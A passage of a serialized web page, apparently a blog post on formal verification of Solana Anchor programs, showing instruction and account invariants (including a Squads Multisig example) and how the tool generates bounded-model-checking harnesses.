...\n}\n",[23132],{"type":26,"tag":130,"props":23133,"children":23134},{"__ignoreMap":7},[23135,23179,23186,23203,23229,23281,23288],{"type":26,"tag":137,"props":23136,"children":23137},{"class":5559,"line":5560},[23138,23142,23147,23151,23155,23159,23163,23167,23171,23175],{"type":26,"tag":137,"props":23139,"children":23140},{"style":5573},[23141],{"type":32,"value":22860},{"type":26,"tag":137,"props":23143,"children":23144},{"style":5682},[23145],{"type":32,"value":23146}," my_invariant",{"type":26,"tag":137,"props":23148,"children":23149},{"style":5601},[23150],{"type":32,"value":165},{"type":26,"tag":137,"props":23152,"children":23153},{"style":5590},[23154],{"type":32,"value":12180},{"type":26,"tag":137,"props":23156,"children":23157},{"style":5601},[23158],{"type":32,"value":5671},{"type":26,"tag":137,"props":23160,"children":23161},{"style":5590},[23162],{"type":32,"value":16348},{"type":26,"tag":137,"props":23164,"children":23165},{"style":6009},[23166],{"type":32,"value":14641},{"type":26,"tag":137,"props":23168,"children":23169},{"style":5601},[23170],{"type":32,"value":12175},{"type":26,"tag":137,"props":23172,"children":23173},{"style":5590},[23174],{"type":32,"value":12180},{"type":26,"tag":137,"props":23176,"children":23177},{"style":5601},[23178],{"type":32,"value":12185},{"type":26,"tag":137,"props":23180,"children":23181},{"class":5559,"line":5412},[23182],{"type":26,"tag":137,"props":23183,"children":23184},{"emptyLinePlaceholder":18},[23185],{"type":32,"value":6276},{"type":26,"tag":137,"props":23187,"children":23188},{"class":5559,"line":5417},[23189,23194,23198],{"type":26,"tag":137,"props":23190,"children":23191},{"style":5601},[23192],{"type":32,"value":23193},"#[succeeds_if(my_invariant(",{"type":26,"tag":137,"props":23195,"children":23196},{"style":5590},[23197],{"type":32,"value":12180},{"type":26,"tag":137,"props":23199,"children":23200},{"style":5601},[23201],{"type":32,"value":23202},"))]\n",{"type":26,"tag":137,"props":23204,"children":23205},{"class":5559,"line":5642},[23206,23211,23216,23221,23225],{"type":26,"tag":137,"props":23207,"children":23208},{"style":5601},[23209],{"type":32,"value":23210},"#[errors_if(",{"type":26,"tag":137,"props":23212,"children":23213},{"style":5590},[23214],{"type":32,"value":23215},"!",{"type":26,"tag":137,"props":23217,"children":23218},{"style":5601},[23219],{"type":32,"value":23220},"my_invariant(",{"type":26,"tag":137,"props":23222,"children":23223},{"style":5590},[23224],{"type":32,"value":12180},{"type":26,"tag":137,"props":23226,"children":23227},{"style":5601},[23228],{"type":32,"value":23202},{"type":26,"tag":137,"props":23230,"children":23231},{"class":5559,"line":5745},[23232,23236,23241,23245,23249,23253,23257,23261,23265,23269,23273,23277],{"type":26,"tag":137,"props":23233,"children":23234},{"style":5573},[23235],{"type":32,"value":22860},{"type":26,"tag":137,"props":23237,"children":23238},{"style":5682},[23239],{"type":32,"value":23240}," my_instruction",{"type":26,"tag":137,"props":23242,"children":23243},{"style":5601},[23244],{"type":32,"value":165},{"type":26,"tag":137,"props":23246,"children":23247},{"style":5584},[23248],{"type":32,"value":22874},{"type":26,"tag":137,"props":23250,"children":23251},{"style":5590},[23252],{"type":32,"value":7072},{"type":26,"tag":137,"props":23254,"children":23255},{"style":6009},[23256],{"type":32,"value":22883},{"type":26,"tag":137,"props":23258,"children":23259},{"style":5601},[23260],{"type":32,"value":8391},{"type":26,"tag":137,"props":23262,"children":23263},{"style":5590},[23264],{"type":32,"value":12180},{"type":26,"tag":137,"props":23266,"children":23267},{"style":5601},[23268],{"type":32,"value":23040},{"type":26,"tag":137,"props":23270,"children":23271},{"style":5590},[23272],{"type":32,"value":16348},{"type":26,"tag":137,"props":23274,"children":23275},{"style":6009},[23276],{"type":32,"value":16353},{"type":26,"tag":137,"props":23278,"children":23279},{"style":5601},[23280],{"type":32,"value":22925},{"type":26,"tag":137,"props":23282,"children":23283},{"class":5559,"line":5850},[23284],{"type":26,"tag":137,"props":23285,"children":23286},{"style":5590},[23287],{"type":32,"value":22933},{"type":26,"tag":137,"props":23289,"children":23290},{"class":5559,"line":5878},[23291],{"type":26,"tag":137,"props":23292,"children":23293},{"style":5601},[23294],{"type":32,"value":6507},{"type":26,"tag":35,"props":23296,"children":23297},{},[23298],{"type":32,"value":23299},"Note that in practice, it is usually not necessary (or useful) to find the exact condition; rather we can achieve the security properties we want purely by proving upper and lower bounds on instruction success.",{"type":26,"tag":21485,"props":23301,"children":23303},{"id":23302},"account-invariants",[23304],{"type":32,"value":23305},"Account Invariants",{"type":26,"tag":35,"props":23307,"children":23308},{},[23309,23311,23316],{"type":32,"value":23310},"The other type of invariant is an ",{"type":26,"tag":84,"props":23312,"children":23313},{},[23314],{"type":32,"value":23315},"Account Invariant",{"type":32,"value":23317},". This invariant describes some property of an account that should always hold.",{"type":26,"tag":35,"props":23319,"children":23320},{},[23321,23323,23328,23329,23335],{"type":32,"value":23322},"In our tool, we verify that the account invariant holds after every instruction that could modify the account data (i.e. if the account is ",{"type":26,"tag":130,"props":23324,"children":23326},{"className":23325},[],[23327],{"type":32,"value":6325},{"type":32,"value":15725},{"type":26,"tag":130,"props":23330,"children":23332},{"className":23331},[],[23333],{"type":32,"value":23334},"init",{"type":32,"value":4437},{"type":26,"tag":35,"props":23337,"children":23338},{},[23339,23341,23347],{"type":32,"value":23340},"For example, given a mock ",{"type":26,"tag":130,"props":23342,"children":23344},{"className":23343},[],[23345],{"type":32,"value":23346},"UserStatement",{"type":32,"value":23348}," account that represents how much a user owns and owes, we could write an invariant that asserts that the net balance is positive:",{"type":26,"tag":5512,"props":23350,"children":23352},{"code":23351,"language":5551,"meta":7,"className":5552,"style":7},"#[account]\n#[invariant(\n    self.assets >= self.liabilities\n)]\nstruct UserStatement {\n    pub owner: Pubkey,\n    pub assets: u64,\n    pub liabilities: u64,\n}\n",[23353],{"type":26,"tag":130,"props":23354,"children":23355},{"__ignoreMap":7},[23356,23364,23372,23406,23413,23429,23455,23479,23503],{"type":26,"tag":137,"props":23357,"children":23358},{"class":5559,"line":5560},[23359],{"type":26,"tag":137,"props":23360,"children":23361},{"style":5601},[23362],{"type":32,"value":23363},"#[account]\n",{"type":26,"tag":137,"props":23365,"children":23366},{"class":5559,"line":5412},[23367],{"type":26,"tag":137,"props":23368,"children":23369},{"style":5601},[23370],{"type":32,"value":23371},"#[invariant(\n",{"type":26,"tag":137,"props":23373,"children":23374},{"class":5559,"line":5417},[23375,23380,23384,23389,23393,23397,23401],{"type":26,"tag":137,"props":23376,"children":23377},{"style":5601},[23378],{"type":32,"value":23379},"    self",{"type":26,"tag":137,"props":23381,"children":23382},{"style":5590},[23383],{"type":32,"value":470},{"type":26,"tag":137,"props":23385,"children":23386},{"style":5601},[23387],{"type":32,"value":23388},"assets ",{"type":26,"tag":137,"props":23390,"children":23391},{"style":5590},[23392],{"type":32,"value":12533},{"type":26,"tag":137,"props":23394,"children":23395},{"style":5601},[23396],{"type":32,"value":16388},{"type":26,"tag":137,"props":23398,"children":23399},{"style":5590},[23400],{"type":32,"value":470},{"type":26,"tag":137,"props":23402,"children":23403},{"style":5601},[23404],{"type":32,"value":23405},"liabilities\n",{"type":26,"tag":137,"props":23407,"children":23408},{"class":5559,"line":5642},[23409],{"type":26,"tag":137,"props":23410,"children":23411},{"style":5601},[23412],{"type":32,"value":22852},{"type":26,"tag":137,"props":23414,"children":23415},{"class":5559,"line":5745},[23416,23420,23425],{"type":26,"tag":137,"props":23417,"children":23418},{"style":5573},[23419],{"type":32,"value":11990},{"type":26,"tag":137,"props":23421,"children":23422},{"style":6009},[23423],{"type":32,"value":23424}," UserStatement",{"type":26,"tag":137,"props":23426,"children":23427},{"style":5601},[23428],{"type":32,"value":5875},{"type":26,"tag":137,"props":23430,"children":23431},{"class":5559,"line":5850},[23432,23437,23442,23446,23451],{"type":26,"tag":137,"props":23433,"children":23434},{"style":5573},[23435],{"type":32,"value":23436},"    pub",{"type":26,"tag":137,"props":23438,"children":23439},{"style":5584},[23440],{"type":32,"value":23441}," owner",{"type":26,"tag":137,"props":23443,"children":23444},{"style":5590},[23445],{"type":32,"value":7072},{"type":26,"tag":137,"props":23447,"children":23448},{"style":6009},[23449],{"type":32,"value":23450}," Pubkey",{"type":26,"tag":137,"props":23452,"children":23453},{"style":5601},[23454],{"type":32,"value":6099},{"type":26,"tag":137,"props":23456,"children":23457},{"class":5559,"line":5878},[23458,23462,23467,23471,23475],{"type":26,"tag":137,"props":23459,"children":23460},{"style":5573},[23461],{"type":32,"value":23436},{"type":26,"tag":137,"props":23463,"children":23464},{"style":5584},[23465],{"type":32,"value":23466}," assets",{"type":26,"tag":137,"props":23468,"children":23469},{"style":5590},[23470],{"type":32,"value":7072},{"type":26,"tag":137,"props":23472,"children":23473},{"style":6009},[23474],{"type":32,"value":8445},{"type":26,"tag":137,"props":23476,"children":23477},{"style":5601},[23478],{"type":32,"value":6099},{"type":26,"tag":137,"props":23480,"children":23481},{"class":5559,"line":5891},[23482,23486,23491,23495,23499],{"type":26,"tag":137,"props":23483,"children":23484},{"style":5573},[23485],{"type":32,"value":23436},{"type":26,"tag":137,"props":23487,"children":23488},{"style":5584},[23489],{"type":32,"value":23490}," liabilities",{"type":26,"tag":137,"props":23492,"children":23493},{"style":5590},[23494],{"type":32,"value":7072},{"type":26,"tag":137,"props":23496,"children":23497},{"style":6009},[23498],{"type":32,"value":8445},{"type":26,"tag":137,"props":23500,"children":23501},{"style":5601},[23502],{"type":32,"value":6099},{"type":26,"tag":137,"props":23504,"children":23505},{"class":5559,"line":5909},[23506],{"type":26,"tag":137,"props":23507,"children":23508},{"style":5601},[23509],{"type":32,"value":6507},{"type":26,"tag":35,"props":23511,"children":23512},{},[23513,23515,23520],{"type":32,"value":23514},"Our tool automatically generates the relevant harnesses to ensure that this property holds every time an account of type ",{"type":26,"tag":130,"props":23516,"children":23518},{"className":23517},[],[23519],{"type":32,"value":23346},{"type":32,"value":23521}," is created or modified.",{"type":26,"tag":35,"props":23523,"children":23524},{},[23525,23527,23533],{"type":32,"value":23526},"In another example, we developed the following invariant for the ",{"type":26,"tag":41,"props":23528,"children":23530},{"href":21416,"rel":23529},[45],[23531],{"type":32,"value":23532},"Squads Multisig",{"type":32,"value":23534}," wallet account:",{"type":26,"tag":5512,"props":23536,"children":23538},{"code":23537,"language":5551,"meta":7,"className":5552,"style":7},"#[account]\n#[invariant(\n    !self.keys.is_empty()\n    && (self.keys.len() \u003C= u16::MAX as usize)\n    && (self.threshold >= 1)\n    && (self.threshold as usize \u003C= self.keys.len())\n)]\npub struct Ms {\n    pub threshold: u16,               // threshold for signatures\n    pub authority_index: u16,         // index to seed other authorities under this multisig\n    pub transaction_index: u32,       // look up and seed reference for transactions\n    pub ms_change_index: u32,         // the last executed/closed transaction\n    pub bump: u8,                     // bump for the multisig seed\n    pub create_key: Pubkey,           // random key(or not) used to seed the multisig pda\n    pub allow_external_execute: bool, // allow non-member keys to execute txs\n    pub keys: Vec\u003CPubkey>,            // keys of the members\n}\n",[23539],{"type":26,"tag":130,"props":23540,"children":23541},{"__ignoreMap":7},[23542,23549,23556,23586,23645,23674,23726,23733,23754,23784,23814,23844,23873,23903,23933,23962,24002],{"type":26,"tag":137,"props":23543,"children":23544},{"class":5559,"line":5560},[23545],{"type":26,"tag":137,"props":23546,"children":23547},{"style":5601},[23548],{"type":32,"value":23363},{"type":26,"tag":137,"props":23550,"children":23551},{"class":5559,"line":5412},[23552],{"type":26,"tag":137,"props":23553,"children":23554},{"style":5601},[23555],{"type":32,"value":23371},{"type":26,"tag":137,"props":23557,"children":23558},{"class":5559,"line":5417},[23559,23564,23568,23572,23577,23581],{"type":26,"tag":137,"props":23560,"children":23561},{"style":5590},[23562],{"type":32,"value":23563},"    !",{"type":26,"tag":137,"props":23565,"children":23566},{"style":5601},[23567],{"type":32,"value":16304},{"type":26,"tag":137,"props":23569,"children":23570},{"style":5590},[23571],{"type":32,"value":470},{"type":26,"tag":137,"props":23573,"children":23574},{"style":5601},[23575],{"type":32,"value":23576},"keys",{"type":26,"tag":137,"props":23578,"children":23579},{"style":5590},[23580],{"type":32,"value":470},{"type":26,"tag":137,"props":23582,"children":23583},{"style":5601},[23584],{"type":32,"value":23585},"is_empty()\n",{"type":26,"tag":137,"props":23587,"children":23588},{"class":5559,"line":5642},[23589,23593,23598,23602,23606,23610,23615,23619,23624,23628,23633,23637,23641],{"type":26,"tag":137,"props":23590,"children":23591},{"style":5590},[23592],{"type":32,"value":18213},{"type":26,"tag":137,"props":23594,"children":23595},{"style":5601},[23596],{"type":32,"value":23597}," (self",{"type":26,"tag":137,"props":23599,"children":23600},{"style":5590},[23601],{"type":32,"value":470},{"type":26,"tag":137,"props":23603,"children":23604},{"style":5601},[23605],{"type":32,"value":23576},{"type":26,"tag":137,"props":23607,"children":23608},{"style":5590},[23609],{"type":32,"value":470},{"type":26,"tag":137,"props":23611,"children":23612},{"style":5601},[23613],{"type":32,"value":23614},"len() ",{"type":26,"tag":137,"props":23616,"children":23617},{"style":5590},[23618],{"type":32,"value":22007},{"type":26,"tag":137,"props":23620,"children":23621},{"style":6009},[23622],{"type":32,"value":23623}," u16",{"type":26,"tag":137,"props":23625,"children":23626},{"style":5590},[23627],{"type":32,"value":6072},{"type":26,"tag":137,"props":23629,"children":23630},{"style":6009},[23631],{"type":32,"value":23632},"MAX",{"type":26,"tag":137,"props":23634,"children":23635},{"style":5573},[23636],{"type":32,"value":11414},{"type":26,"tag":137,"props":23638,"children":23639},{"style":6009},[23640],{"type":32,"value":16322},{"type":26,"tag":137,"props":23642,"children":23643},{"style":5601},[23644],{"type":32,"value":5742},{"type":26,"tag":137,"props":23646,"children":23647},{"class":5559,"line":5745},[23648,23652,23656,23660,23665,23669],{"type":26,"tag":137,"props":23649,"children":23650},{"style":5590},[23651],{"type":32,"value":18213},{"type":26,"tag":137,"props":23653,"children":23654},{"style":5601},[23655],{"type":32,"value":23597},{"type":26,"tag":137,"props":23657,"children":23658},{"style":5590},[23659],{"type":32,"value":470},{"type":26,"tag":137,"props":23661,"children":23662},{"style":5601},[23663],{"type":32,"value":23664},"threshold ",{"type":26,"tag":137,"props":23666,"children":23667},{"style":5590},[23668],{"type":32,"value":12533},{"type":26,"tag":137,"props":23670,"children":23671},{"style":5601},[23672],{"type":32,"value":23673}," 1)\n",{"type":26,"tag":137,"props":23675,"children":23676},{"class":5559,"line":5850},[23677,23681,23685,23689,23693,23697,23701,23705,23709,23713,23717,23721],{"type":26,"tag":137,"props":23678,"children":23679},{"style":5590},[23680],{"type":32,"value":18213},{"type":26,"tag":137,"props":23682,"children":23683},{"style":5601},[23684],{"type":32,"value":23597},{"type":26,"tag":137,"props":23686,"children":23687},{"style":5590},[23688],{"type":32,"value":470},{"type":26,"tag":137,"props":23690,"children":23691},{"style":5601},[23692],{"type":32,"value":23664},{"type":26,"tag":137,"props":23694,"children":23695},{"style":5573},[23696],{"type":32,"value":11428},{"type":26,"tag":137,"props":23698,"children":23699},{"style":6009},[23700],{"type":32,"value":16322},{"type":26,"tag":137,"props":23702,"children":23703},{"style":5590},[23704],{"type":32,"value":10782},{"type":26,"tag":137,"props":23706,"children":23707},{"style":5601},[23708],{"type":32,"value":16388},{"type":26,"tag":137,"props":23710,"children":23711},{"style":5590},[23712],{"type":32,"value":470},{"type":26,"tag":137,"props":23714,"children":23715},{"style":5601},[23716],{"type":32,"value":23576},{"type":26,"tag":137,"props":23718,"children":23719},{"style":5590},[23720],{"type":32,"value":470},{"type":26,"tag":137,"props":23722,"children":23723},{"style":5601},[23724],{"type":32,"value":23725},"len())\n",{"type":26,"tag":137,"props":23727,"children":23728},{"class":5559,"line":5878},[23729],{"type":26,"tag":137,"props":23730,"children":23731},{"style":5601},[23732],{"type":32,"value":22852},{"type":26,"tag":137,"props":23734,"children":23735},{"class":5559,"line":5891},[23736,23740,23745,23750],{"type":26,"tag":137,"props":23737,"children":23738},{"style":5573},[23739],{"type":32,"value":16281},{"type":26,"tag":137,"props":23741,"children":23742},{"style":5573},[23743],{"type":32,"value":23744}," struct",{"type":26,"tag":137,"props":23746,"children":23747},{"style":6009},[23748],{"type":32,"value":23749}," Ms",{"type":26,"tag":137,"props":23751,"children":23752},{"style":5601},[23753],{"type":32,"value":5875},{"type":26,"tag":137,"props":23755,"children":23756},{"class":5559,"line":5909},[23757,23761,23766,23770,23774,23779],{"type":26,"tag":137,"props":23758,"children":23759},{"style":5573},[23760],{"type":32,"value":23436},{"type":26,"tag":137,"props":23762,"children":23763},{"style":5584},[23764],{"type":32,"value":23765}," threshold",{"type":26,"tag":137,"props":23767,"children":23768},{"style":5590},[23769],{"type":32,"value":7072},{"type":26,"tag":137,"props":23771,"children":23772},{"style":6009},[23773],{"type":32,"value":23623},{"type":26,"tag":137,"props":23775,"children":23776},{"style":5601},[23777],{"type":32,"value":23778},",               ",{"type":26,"tag":137,"props":23780,"children":23781},{"style":5564},[23782],{"type":32,"value":23783},"// threshold for signatures\n",{"type":26,"tag":137,"props":23785,"children":23786},{"class":5559,"line":5930},[23787,23791,23796,23800,23804,23809],{"type":26,"tag":137,"props":23788,"children":23789},{"style":5573},[23790],{"type":32,"value":23436},{"type":26,"tag":137,"props":23792,"children":23793},{"style":5584},[23794],{"type":32,"value":23795}," authority_index",{"type":26,"tag":137,"props":23797,"children":23798},{"style":5590},[23799],{"type":32,"value":7072},{"type":26,"tag":137,"props":23801,"children":23802},{"style":6009},[23803],{"type":32,"value":23623},{"type":26,"tag":137,"props":23805,"children":23806},{"style":5601},[23807],{"type":32,"value":23808},",         ",{"type":26,"tag":137,"props":23810,"children":23811},{"style":5564},[23812],{"type":32,"value":23813},"// index to seed other authorities under this multisig\n",{"type":26,"tag":137,"props":23815,"children":23816},{"class":5559,"line":5939},[23817,23821,23826,23830,23834,23839],{"type":26,"tag":137,"props":23818,"children":23819},{"style":5573},[23820],{"type":32,"value":23436},{"type":26,"tag":137,"props":23822,"children":23823},{"style":5584},[23824],{"type":32,"value":23825}," transaction_index",{"type":26,"tag":137,"props":23827,"children":23828},{"style":5590},[23829],{"type":32,"value":7072},{"type":26,"tag":137,"props":23831,"children":23832},{"style":6009},[23833],{"type":32,"value":20141},{"type":26,"tag":137,"props":23835,"children":23836},{"style":5601},[23837],{"type":32,"value":23838},",       ",{"type":26,"tag":137,"props":23840,"children":23841},{"style":5564},[23842],{"type":32,"value":23843},"// look up and seed reference for transactions\n",{"type":26,"tag":137,"props":23845,"children":23846},{"class":5559,"line":6191},[23847,23851,23856,23860,23864,23868],{"type":26,"tag":137,"props":23848,"children":23849},{"style":5573},[23850],{"type":32,"value":23436},{"type":26,"tag":137,"props":23852,"children":23853},{"style":5584},[23854],{"type":32,"value":23855}," ms_change_index",{"type":26,"tag":137,"props":23857,"children":23858},{"style":5590},[23859],{"type":32,"value":7072},{"type":26,"tag":137,"props":23861,"children":23862},{"style":6009},[23863],{"type":32,"value":20141},{"type":26,"tag":137,"props":23865,"children":23866},{"style":5601},[23867],{"type":32,"value":23808},{"type":26,"tag":137,"props":23869,"children":23870},{"style":5564},[23871],{"type":32,"value":23872},"// the last executed/closed transaction\n",{"type":26,"tag":137,"props":23874,"children":23875},{"class":5559,"line":6208},[23876,23880,23885,23889,23893,23898],{"type":26,"tag":137,"props":23877,"children":23878},{"style":5573},[23879],{"type":32,"value":23436},{"type":26,"tag":137,"props":23881,"children":23882},{"style":5584},[23883],{"type":32,"value":23884}," bump",{"type":26,"tag":137,"props":23886,"children":23887},{"style":5590},[23888],{"type":32,"value":7072},{"type":26,"tag":137,"props":23890,"children":23891},{"style":6009},[23892],{"type":32,"value":17225},{"type":26,"tag":137,"props":23894,"children":23895},{"style":5601},[23896],{"type":32,"value":23897},",                     ",{"type":26,"tag":137,"props":23899,"children":23900},{"style":5564},[23901],{"type":32,"value":23902},"// bump for the multisig seed\n",{"type":26,"tag":137,"props":23904,"children":23905},{"class":5559,"line":6225},[23906,23910,23915,23919,23923,23928],{"type":26,"tag":137,"props":23907,"children":23908},{"style":5573},[23909],{"type":32,"value":23436},{"type":26,"tag":137,"props":23911,"children":23912},{"style":5584},[23913],{"type":32,"value":23914}," create_key",{"type":26,"tag":137,"props":23916,"children":23917},{"style":5590},[23918],{"type":32,"value":7072},{"type":26,"tag":137,"props":23920,"children":23921},{"style":6009},[23922],{"type":32,"value":23450},{"type":26,"tag":137,"props":23924,"children":23925},{"style":5601},[23926],{"type":32,"value":23927},",           ",{"type":26,"tag":137,"props":23929,"children":23930},{"style":5564},[23931],{"type":32,"value":23932},"// random key(or not) used to seed the multisig pda\n",{"type":26,"tag":137,"props":23934,"children":23935},{"class":5559,"line":6238},[23936,23940,23945,23949,23953,23957],{"type":26,"tag":137,"props":23937,"children":23938},{"style":5573},[23939],{"type":32,"value":23436},{"type":26,"tag":137,"props":23941,"children":23942},{"style":5584},[23943],{"type":32,"value":23944}," allow_external_execute",{"type":26,"tag":137,"props":23946,"children":23947},{"style":5590},[23948],{"type":32,"value":7072},{"type":26,"tag":137,"props":23950,"children":23951},{"style":6009},[23952],{"type":32,"value":14641},{"type":26,"tag":137,"props":23954,"children":23955},{"style":5601},[23956],{"type":32,"value":1108},{"type":26,"tag":137,"props":23958,"children":23959},{"style":5564},[23960],{"type":32,"value":23961},"// allow non-member keys to execute txs\n",{"type":26,"tag":137,"props":23963,"children":23964},{"class":5559,"line":6247},[23965,23969,23974,23978,23983,23987,23992,23997],{"type":26,"tag":137,"props":23966,"children":23967},{"style":5573},[23968],{"type":32,"value":23436},{"type":26,"tag":137,"props":23970,"children":23971},{"style":5584},[23972],{"type":32,"value":23973}," keys",{"type":26,"tag":137,"props":23975,"children":23976},{"style":5590},[23977],{"type":32,"value":7072},{"type":26,"tag":137,"props":23979,"children":23980},{"style":6009},[23981],{"type":32,"value":23982}," Vec",{"type":26,"tag":137,"props":23984,"children":23985},{"style":5601},[23986],{"type":32,"value":8391},{"type":26,"tag":137,"props":23988,"children":23989},{"style":6009},[23990],{"type":32,"value":23991},"Pubkey",{"type":26,"tag":137,"props":23993,"children":23994},{"style":5601},[23995],{"type":32,"value":23996},">,            ",{"type":26,"tag":137,"props":23998,"children":23999},{"style":5564},[24000],{"type":32,"value":24001},"// keys of the members\n",{"type":26,"tag":137,"props":24003,"children":24004},{"class":5559,"line":6270},[24005],{"type":26,"tag":137,"props":24006,"children":24007},{"style":5601},[24008],{"type":32,"value":6507},{"type":26,"tag":35,"props":24010,"children":24011},{},[24012],{"type":32,"value":24013},"Here we are verifying multiple things at once:",{"type":26,"tag":3426,"props":24015,"children":24016},{},[24017,24028,24039,24050],{"type":26,"tag":3430,"props":24018,"children":24019},{},[24020,24026],{"type":26,"tag":130,"props":24021,"children":24023},{"className":24022},[],[24024],{"type":32,"value":24025},"!self.keys.is_empty()",{"type":32,"value":24027}," : ensure there is at least one member",{"type":26,"tag":3430,"props":24029,"children":24030},{},[24031,24037],{"type":26,"tag":130,"props":24032,"children":24034},{"className":24033},[],[24035],{"type":32,"value":24036},"self.keys.len() \u003C= u16::MAX as usize",{"type":32,"value":24038}," : set an upper limit of 65535 members",{"type":26,"tag":3430,"props":24040,"children":24041},{},[24042,24048],{"type":26,"tag":130,"props":24043,"children":24045},{"className":24044},[],[24046],{"type":32,"value":24047},"self.threshold >= 1",{"type":32,"value":24049}," : ensure we always need at least one member to sign (threshold of zero would require no signers!)",{"type":26,"tag":3430,"props":24051,"children":24052},{},[24053,24059],{"type":26,"tag":130,"props":24054,"children":24056},{"className":24055},[],[24057],{"type":32,"value":24058},"self.threshold as usize \u003C= self.keys.len()",{"type":32,"value":24060}," : ensure we always have enough potential members to sign; if threshold was greater than the number of keys, no one could sign",{"type":26,"tag":92,"props":24062,"children":24064},{"id":24063},"verification-how-do-we-check-that-our-model-is-correct",[24065],{"type":32,"value":24066},"Verification: How do we check that our model is correct?",{"type":26,"tag":35,"props":24068,"children":24069},{},[24070,24072,24076,24078,24083],{"type":32,"value":24071},"Now that we have defined the specific instruction and account invariants, we need to generate ",{"type":26,"tag":762,"props":24073,"children":24074},{},[24075],{"type":32,"value":22562},{"type":32,"value":24077}," on which we can run bounded model checking. Our tool does this ",{"type":26,"tag":762,"props":24079,"children":24080},{},[24081],{"type":32,"value":24082},"automagically",{"type":32,"value":24084}," for anchor-lang programs.",{"type":26,"tag":35,"props":24086,"children":24087},{},[24088,24090,24096,24097,24102,24104,24109,24110,24115,24117,24122,24124,24129,24130,24136,24138,24144,24145,24151],{"type":32,"value":24089},"Specifically, for a given ",{"type":26,"tag":130,"props":24091,"children":24093},{"className":24092},[],[24094],{"type":32,"value":24095},"Context\u003CT>",{"type":32,"value":2081},{"type":26,"tag":762,"props":24098,"children":24099},{},[24100],{"type":32,"value":24101},"incoming",{"type":32,"value":24103}," accounts of types (",{"type":26,"tag":130,"props":24105,"children":24107},{"className":24106},[],[24108],{"type":32,"value":23334},{"type":32,"value":7162},{"type":26,"tag":130,"props":24111,"children":24113},{"className":24112},[],[24114],{"type":32,"value":6325},{"type":32,"value":24116},") and ",{"type":26,"tag":762,"props":24118,"children":24119},{},[24120],{"type":32,"value":24121},"outgoing",{"type":32,"value":24123}," accounts of type (",{"type":26,"tag":130,"props":24125,"children":24127},{"className":24126},[],[24128],{"type":32,"value":6325},{"type":32,"value":7162},{"type":26,"tag":130,"props":24131,"children":24133},{"className":24132},[],[24134],{"type":32,"value":24135},"close",{"type":32,"value":24137},") we define a ",{"type":26,"tag":130,"props":24139,"children":24141},{"className":24140},[],[24142],{"type":32,"value":24143},"pre_condition",{"type":32,"value":3339},{"type":26,"tag":130,"props":24146,"children":24148},{"className":24147},[],[24149],{"type":32,"value":24150},"post_condition",{"type":32,"value":24152}," expression that is a conjunction of all of the incoming and outcoming account invariants:",{"type":26,"tag":35,"props":24154,"children":24155},{},[24156],{"type":26,"tag":130,"props":24157,"children":24159},{"className":24158},[133,134],[24160],{"type":26,"tag":137,"props":24161,"children":24163},{"className":24162},[140],[24164],{"type":26,"tag":137,"props":24165,"children":24167},{"className":24166,"ariaHidden":146},[145],[24168,24201],{"type":26,"tag":137,"props":24169,"children":24171},{"className":24170},[151],[24172,24176,24182,24187,24191,24197],{"type":26,"tag":137,"props":24173,"children":24175},{"className":24174,"style":1512},[156],[],{"type":26,"tag":137,"props":24177,"children":24179},{"className":24178,"style":1731},[169,170],[24180],{"type":32,"value":24181},"P",{"type":26,"tag":137,"props":24183,"children":24185},{"className":24184},[169],[24186],{"type":32,"value":1817},{"type":26,"tag":137,"props":24188,"children":24190},{"className":24189,"style":281},[184],[],{"type":26,"tag":137,"props":24192,"children":24194},{"className":24193},[286],[24195],{"type":32,"value":24196},":=",{"type":26,"tag":137,"props":24198,"children":24200},{"className":24199,"style":281},[184],[],{"type":26,"tag":137,"props":24202,"children":24204},{"className":24203},[151],[24205,24210,24341,24345],{"type":26,"tag":137,"props":24206,"children":24209},{"className":24207,"style":24208},[156],"height:1.2247em;vertical-align:-0.4747em;",[],{"type":26,"tag":137,"props":24211,"children":24213},{"className":24212},[3722],[24214,24220],{"type":26,"tag":137,"props":24215,"children":24217},{"className":24216,"style":3725},[3722,3723,3724],[24218],{"type":32,"value":24219},"⋀",{"type":26,"tag":137,"props":24221,"children":24223},{"className":24222},[236],[24224],{"type":26,"tag":137,"props":24225,"children":24227},{"className":24226},[241,417],[24228,24329],{"type":26,"tag":137,"props":24229,"children":24231},{"className":24230},[246],[24232,24324],{"type":26,"tag":137,"props":24233,"children":24236},{"className":24234,"style":24235},[251],"height:0.2253em;",[24237],{"type":26,"tag":137,"props":24238,"children":24240},{"style":24239},"top:-2.4003em;margin-left:0em;margin-right:0.05em;",[24241,24245],{"type":26,"tag":137,"props":24242,"children":24244},{"className":24243,"style":262},[261],[],{"type":26,"tag":137,"props":24246,"children":24248},{"className":24247},[267,268,269,270],[24249],{"type":26,"tag":137,"props":24250,"children":24252},{"className":24251},[169,270],[24253,24258,24264,24274,24280,24289,24298,24303,24308,24314,24319],{"type":26,"tag":137,"props":24254,"children":24256},{"className":24255},[169,170,270],[24257],{"type":32,"value":41},{"type":26,"tag":137,"props":24259,"children":24261},{"className":24260},[169,170,270],[24262],{"type":32,"value":24263},"cc",{"type":26,"tag":137,"props":24265,"children":24267},{"className":24266},[184,270],[24268],{"type":26,"tag":137,"props":24269,"children":24271},{"className":24270},[270],[24272],{"type":32,"value":24273}," ",{"type":26,"tag":137,"props":24275,"children":24277},{"className":24276},[286,270],[24278],{"type":32,"value":24279},"∈",{"type":26,"tag":137,"props":24281,"children":24283},{"className":24282},[184,270],[24284],{"type":26,"tag":137,"props":24285,"children":24287},{"className":24286},[270],[24288],{"type":32,"value":24273},{"type":26,"tag":137,"props":24290,"children":24292},{"className":24291},[169,32,270],[24293],{"type":26,"tag":137,"props":24294,"children":24296},{"className":24295},[169,270],[24297],{"type":32,"value":24101},{"type":26,"tag":137,"props":24299,"children":24301},{"className":24300},[162,270],[24302],{"type":32,"value":165},{"type":26,"tag":137,"props":24304,"children":24306},{"className":24305},[169,170,270],[24307],{"type":32,"value":4326},{"type":26,"tag":137,"props":24309,"children":24311},{"className":24310},[169,170,270],[24312],{"type":32,"value":24313},"t",{"type":26,"tag":137,"props":24315,"children":24317},{"className":24316},[169,170,270],[24318],{"type":32,"value":173},{"type":26,"tag":137,"props":24320,"children":24322},{"className":24321},[197,270],[24323],{"type":32,"value":200},{"type":26,"tag":137,"props":24325,"children":24327},{"className":24326},[453],[24328],{"type":32,"value":456},{"type":26,"tag":137,"props":24330,"children":24332},{"className":24331},[246],[24333],{"type":26,"tag":137,"props":24334,"children":24337},{"className":24335,"style":24336},[251],"height:0.4747em;",[24338],{"type":26,"tag":137,"props":24339,"children":24340},{},[],{"type":26,"tag":137,"props":24342,"children":24344},{"className":24343,"style":185},[184],[],{"type":26,"tag":137,"props":24346,"children":24348},{"cl